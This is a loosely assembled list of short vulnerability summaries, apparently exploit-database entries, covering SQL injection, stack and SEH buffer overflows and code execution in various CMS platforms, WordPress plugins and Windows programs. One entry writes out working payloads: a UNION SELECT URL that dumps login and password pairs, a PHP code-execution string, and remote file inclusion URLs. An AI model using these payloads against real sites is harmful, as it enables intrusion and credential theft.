An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The vulnerable code is located in the modules/ticketsmith/view.php file, where the user-supplied input is not properly sanitized before being used in a SQL query. This can be exploited to manipulate the SQL query by injecting arbitrary SQL code. The vulnerable code is located in the modules/ticketsmith/common.inc.php file, where the user-supplied input is not properly sanitized before being used in a SQL query. This can be exploited to manipulate the SQL query by injecting arbitrary SQL code.
A SQL injection vulnerability exists in WordPress WP Forum Server plugin version 1.7 and below. An attacker can send a specially crafted POST request to the vulnerable wpf-insert.php script, which contains malicious SQL code in the edit_post_id parameter. This can allow an attacker to execute arbitrary SQL commands on the underlying database.
This module exploits a vulnerability in the coreservice.exe component of Proycon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, Coreservice.exe should automatically recover.
A vulnerability in AstroCMS allows an attacker to exploit a SQL-INJ vulnerability in the forgot password page, register a user with admin rights and read files from the server.
A code execution vulnerability exists in Slaed CMS versions 4.* and OpenSlaed 1.2 (free). An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code is executed in the context of the web server process.
On different versions of this software next vulnerabilities are availible: Sql-injection: /search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23 Code exec: /search/?action=index&text={${phpinfo()}} Remote File Inclusion: /netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell? /netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell? /netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?
Wav player can not handle properly large playlists (more than 1G). Reproduce: Open the wav player, make a playlist and save it. Then, close the player and run this exploit to create the new playlist. When you open again wav player, you will see the calc. ;)
A buffer overflow vulnerability exists in KnFTP, which is a non-safeseh module. An attacker can exploit this vulnerability by sending a specially crafted payload of 271 bytes to the vulnerable server, which will overwrite the EIP and SEH registers. This can be used to execute arbitrary code on the vulnerable system.
The WordPress Tune Library plugin version 2.17 and below is vulnerable to a SQL injection vulnerability. This vulnerability is due to the lack of proper sanitization of user-supplied input in the 'letter' parameter of the 'tune-library-ajax.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to sensitive information such as the version of the database, the current user, and the database name.
The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file, as a result of adding extra bytes to parts of the file (Text section), giving the attackers possibility to run an arbitrary code execution on the system that install Melon Player.
Services By CQR